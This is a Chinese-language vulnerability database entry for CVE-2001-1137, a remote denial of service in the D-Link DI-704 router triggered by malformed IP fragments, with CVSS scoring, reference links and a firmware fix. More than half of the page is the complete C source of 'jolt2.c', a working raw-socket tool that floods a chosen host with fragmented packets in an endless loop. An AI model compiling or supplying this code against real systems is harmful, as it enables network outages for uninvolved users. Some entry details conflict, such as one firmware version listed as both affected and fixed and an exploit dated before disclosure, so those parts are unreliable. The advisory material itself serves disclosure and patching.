CVE-2001-1137
CVSS5.0
发布时间 :2001-09-06 00:00:00
修订时间 :2008-09-10 15:09:44
NMCOES    

[原文]D-Link DI-704 Internet Gateway firmware earlier than V2.56b6 allows remote attackers to cause a denial of service (reboot) via malformed IP datagram fragments.


[CNNVD]DLink IP 分片报文造成拒绝服务漏洞(CNNVD-200109-016)

        CVE(CAN) ID: CAN-2001-1137
        
        
        
        DLink Dl-704 是一个DSL/Cable 路由器和交换机设备。
        
        
        
        如果发送大量的分片IP报文,将使得Dl-704路由器资源耗尽。在收到这样的报文大概2分钟
        
        后,路由器变得不稳定,不能正常工作。
        
        
        
        攻击者可以远程进行拒绝服务攻击。只有重新启动电源才可以恢复正常工作。
        
        
        
        
        
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1137
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1137
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-016
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/7090.php
(VENDOR_ADVISORY)  XF  dlink-fragmented-packet-dos(7090)
http://www.securityfocus.com/archive/1/212532
(VENDOR_ADVISORY)  BUGTRAQ  20010906 Malformed Fragmented Packets DoS Dlink Firewall/Routers
http://www.securityfocus.com/bid/3306
(UNKNOWN)  BID  3306

- 漏洞信息

DLink IP 分片报文造成拒绝服务漏洞
中危 其他
2001-09-06 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-1137
        
        
        
        DLink Dl-704 是一个DSL/Cable 路由器和交换机设备。
        
        
        
        如果发送大量的分片IP报文,将使得Dl-704路由器资源耗尽。在收到这样的报文大概2分钟
        
        后,路由器变得不稳定,不能正常工作。
        
        
        
        攻击者可以远程进行拒绝服务攻击。只有重新启动电源才可以恢复正常工作。
        
        
        
        
        
        

- 公告与补丁

        
        
        厂商补丁:
        
        
        
        升级到V2.56b6将会修复这些问题,下载地址:
        
        
        http://www.dlink.com.tw/2000e/download/download.htm

- 漏洞信息 (21103)

D-Link Dl-704 2.56 b5 IP Fragment Denial Of Service Vulnerability (EDBID:21103)
hardware dos
2000-05-23 Verified
0 phonix
N/A [点击下载]
source: http://www.securityfocus.com/bid/3306/info

The DLink Dl-704 is a DSL/Cable router and switch designed for home network use.

A problem has been discovered in the Dl-704 router. Upon receiving a high amount of fragmented IP packets, the router begins to become resource starved. After receiving these packets for a period greater than two minutes, the router will become unstable, ceasing operation.

This results in a denial of service users on either side of the router. A power cycling is required to resume normal operation. 

/*
 * File:   jolt2.c
 * Author: Phonix <phonix@moocow.org>
 * Date:   23-May-00
 *
 * Description: This is the proof-of-concept code for the
 *              Windows denial-of-serice attack described by
 *              the Razor team (NTBugtraq, 19-May-00)
 *              (MS00-029).  This code causes cpu utilization
 *              to go to 100%.
 *
 * Tested against: Win98; NT4/SP5,6; Win2K
 *
 * Written for: My Linux box.  YMMV.  Deal with it.
 *
 * Thanks: This is standard code.  Ripped from lots of places.
 *         Insert your name here if you think you wrote some of
 *         it.  It's a trivial exploit, so I won't take credit
 *         for anything except putting this file together.
 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <getopt.h>

struct _pkt
{
  struct iphdr    ip;
  union {
    struct icmphdr  icmp;
    struct udphdr   udp;
  }  proto;
  char data;
} pkt;

int icmplen  = sizeof(struct icmphdr),
    udplen   = sizeof(struct udphdr),
    iplen    = sizeof(struct iphdr),
    spf_sck;

void usage(char *pname)
{
  fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
           pname);
  fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n");
  exit(0);
}

u_long host_to_ip(char *host_name)
{
  static  u_long ip_bytes;
  struct hostent *res;

  res = gethostbyname(host_name);
  if (res == NULL)
    return (0);
  memcpy(&ip_bytes, res->h_addr, res->h_length);
  return (ip_bytes);
}

void quit(char *reason)
{
  perror(reason);
  close(spf_sck);
  exit(-1);
}

int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
  int     bs, psize;
  unsigned long x;
  struct  sockaddr_in to;

  to.sin_family = AF_INET;
  to.sin_port = 1235;
  to.sin_addr.s_addr = dst_addr;

  if (port)
    psize = iplen + udplen + 1;
  else
    psize = iplen + icmplen + 1;
  memset(&pkt, 0, psize);

  pkt.ip.version = 4;
  pkt.ip.ihl = 5;
  pkt.ip.tot_len = htons(iplen + icmplen) + 40;
  pkt.ip.id = htons(0x455);
  pkt.ip.ttl = 255;
  pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
  pkt.ip.saddr = src_addr;
  pkt.ip.daddr = dst_addr;
  pkt.ip.frag_off = htons (8190);

  if (port)
  {
    pkt.proto.udp.source = htons(port|1235);
    pkt.proto.udp.dest = htons(port);
    pkt.proto.udp.len = htons(9);
    pkt.data = 'a';
  } else {
    pkt.proto.icmp.type = ICMP_ECHO;
    pkt.proto.icmp.code = 0;
    pkt.proto.icmp.checksum = 0;
  }

  while (1) {
    bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
              sizeof(struct sockaddr));
  }
  return bs;
}

int main(int argc, char *argv[])
{
  u_long  src_addr, dst_addr;
  int i, bs=1, port=0;
  char hostname[32];

  if (argc < 2)
    usage (argv[0]);

  gethostname (hostname, 32);
  src_addr = host_to_ip(hostname);

  while ((i = getopt (argc, argv, "s:p:h")) != EOF)
  {
    switch (i)
    {
      case 's':
        dst_addr = host_to_ip(optarg);
        if (!dst_addr)
          quit("Bad source address given.");
        break;

      case 'p':
        port = atoi(optarg);
        if ((port <=0) || (port > 65535))
          quit ("Invalid port number given.");
        break;

      case 'h':
      default:
        usage (argv[0]);
    }
  }

  dst_addr = host_to_ip(argv[argc-1]);
  if (!dst_addr)
    quit("Bad destination address given.");

  spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (!spf_sck)
    quit("socket()");
  if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
      sizeof(bs)) < 0)
    quit("IP_HDRINCL");

  do_frags (spf_sck, src_addr, dst_addr, port);
}
		

- 漏洞信息

9402
D-Link DI-704 Internet Gateway Malformed IP Datagram Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2002-09-06 Unknow
2002-09-06 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

D-Link IP Fragment Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 3306
Yes No
2001-09-06 12:00:00 2009-07-11 07:56:00
This vulnerability was announced by Fate Labs via Bugtraq on September 6, 2001.

- 受影响的程序版本

D-Link Dl-704 2.56 b5
D-Link Dl-704 2.56 b6

- 不受影响的程序版本

D-Link Dl-704 2.56 b6

- 漏洞讨论

The DLink Dl-704 is a DSL/Cable router and switch designed for home network use.

A problem has been discovered in the Dl-704 router. Upon receiving a high amount of fragmented IP packets, the router begins to become resource starved. After receiving these packets for a period greater than two minutes, the router will become unstable, ceasing operation.

This results in a denial of service users on either side of the router. A power cycling is required to resume normal operation.

- 漏洞利用

x

- 解决方案

Upgrade available:


D-Link Dl-704 2.56 b5

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站